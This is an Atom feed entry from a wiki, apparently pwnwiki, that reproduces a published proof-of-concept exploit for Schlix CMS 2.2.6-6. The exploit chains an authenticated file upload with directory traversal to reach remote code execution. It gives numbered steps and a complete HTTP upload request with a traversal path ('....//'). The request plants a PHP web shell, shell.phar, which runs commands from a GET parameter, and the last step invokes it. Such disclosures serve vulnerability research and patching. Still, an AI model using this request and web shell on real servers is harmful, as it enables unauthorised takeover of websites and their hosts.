https://pwnwiki.com/index.php?action=history&feed=atom&title=Schlix_CMS_2.2.6-6_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%26RCE%E6%BC%8F%E6%B4%9E 2026-04-26T08:28:01Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Schlix_CMS_2.2.6-6_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%26RCE%E6%BC%8F%E6%B4%9E&diff=3244&oldid=prev 2021-05-24T08:31:30Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated) # Date: 21.05.2021 # Exploit Author: Emir Polat #...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)<br /> # Date: 21.05.2021<br /> # Exploit Author: Emir Polat<br /> # Vendor Homepage: https://www.schlix.com/<br /> # Software Link: https://www.schlix.com/html/schlix-cms-downloads.html<br /> # Version: 2.2.6-6<br /> # Tested On: Ubuntu 20.04 (Firefox)<br /> <br /> ############################################################################################################<br /> <br /> Summary: An authorized user can upload a file with a .phar extension<br /> to a path of his choice and control the content as he wishes. This causes RCE vulnerability.<br /> <br /> For full technical details and source code analysis:<br /> https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.<br /> <br /> ############################################################################################################<br /> <br /> PoC:<br /> <br /> 1-) Login to admin panel with true credentials and go to &quot;Tools -&gt;<br /> Mediamanager&quot; menu from left side.<br /> <br /> 2-) Click the &quot;Upload File&quot; and upload a file and catch the request with Burp.<br /> <br /> 3-) Change the &quot;uploadstartpath&quot;, &quot;filename&quot; and file content as follows.<br /> <br /> # Request<br /> <br /> POST /schlix/admin/app/core.mediamanager?&amp;ajax=1&amp;action=upload HTTP/1.1<br /> Host: vulnerable-server<br /> Content-Length: 846<br /> X-Schlix-Ajax: 1<br /> X-Requested-With: XMLHttpRequest<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br /> Content-Type: multipart/form-data;<br /> boundary=----WebKitFormBoundarybllOFLruz1WAs7K2<br /> Accept: */*<br /> Origin: http:// &lt;http://10.211.55.4/&gt;vulnerable-server<br /> Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager<br /> &lt;http://10.211.55.4/schlix/admin/app/core.mediamanager&gt;<br /> Accept-Encoding: gzip, deflate<br /> Accept-Language: en-US,en;q=0.9<br /> Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;<br /> schlix-your-cookie;__atuvc=5%7C20;<br /> schlix_frontendedit_control_showblock=-2;<br /> schlix_frontendedit_control_showhide=-2;<br /> schlix_frontendedit_control_showdoc=-2<br /> Connection: close<br /> <br /> ------WebKitFormBoundarybllOFLruz1WAs7K2<br /> Content-Disposition: form-data; name=&quot;_csrftoken&quot;<br /> <br /> {your_csrf_token}<br /> ------WebKitFormBoundarybllOFLruz1WAs7K2<br /> Content-Disposition: form-data; name=&quot;uploadstartpath&quot;<br /> <br /> /media/docs/....//....//....//....//system/images/avatars/large/<br /> ------WebKitFormBoundarybllOFLruz1WAs7K2<br /> Content-Disposition: form-data; name=&quot;filedata[]&quot;; filename=&quot;shell.phar&quot;<br /> <br /> &lt;?PHP system($_GET['rce']);?&gt;<br /> <br /> ------WebKitFormBoundarybllOFLruz1WAs7K2<br /> Content-Disposition: form-data; name=&quot;MAX_FILE_SIZE&quot;<br /> <br /> 2097152<br /> ------WebKitFormBoundarybllOFLruz1WAs7K2<br /> Content-Disposition: form-data; name=&quot;filedata__total_file_size&quot;<br /> <br /> 0<br /> ------WebKitFormBoundarybllOFLruz1WAs7K2<br /> Content-Disposition: form-data; name=&quot;filedata__max_file_count&quot;<br /> <br /> 20<br /> ------WebKitFormBoundarybllOFLruz1WAs7K2--<br /> <br /> <br /> 4-) Go to &quot;vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls&quot;.<br /> &lt;/pre&gt;</div>

Pwnwiki